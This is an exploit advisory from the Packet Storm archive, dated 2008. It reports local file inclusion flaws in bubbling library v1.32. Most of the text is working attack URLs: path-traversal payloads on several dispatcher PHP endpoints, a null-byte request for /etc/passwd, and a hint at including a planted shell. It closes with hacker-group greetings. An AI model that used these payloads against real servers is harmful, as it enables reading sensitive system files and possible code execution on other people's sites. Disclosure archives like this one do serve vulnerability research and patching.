bubbling-lfi.txt

2008-01-28T00:00:00
ID PACKETSTORM:63044
Type packetstorm
Reporter Stack-Terrorist
Modified 2008-01-28T00:00:00

Description

                                        
                                            `## bubbling library v1.32 multiple Local File Inclusion Vulnerabilities   
## Download scrip : http://sourceforge.net/project/showfiles.php?group_id=192730  
## Author : Stack-Terrorist [v40]  
## Email : v.4@hotmail.fr  
  
## Home : http://www.v4-team.com  
## for execute exploit does not write extention of file  
## Other files: =../../../../etc/passwd%00   
## exploit :  
#   
# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax  
http://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php]  
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php]  
http://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php]  
# examples/dispatcher/framework/simple.php?page=/home/user/shell  
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php]  
http://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php]  
http://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php]  
  
Greetz : H-T Team , v4 Team , Tryag , no-hack all my friend   
Special tnx for : Houssamix  
thx for: Proamk - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke   
  
`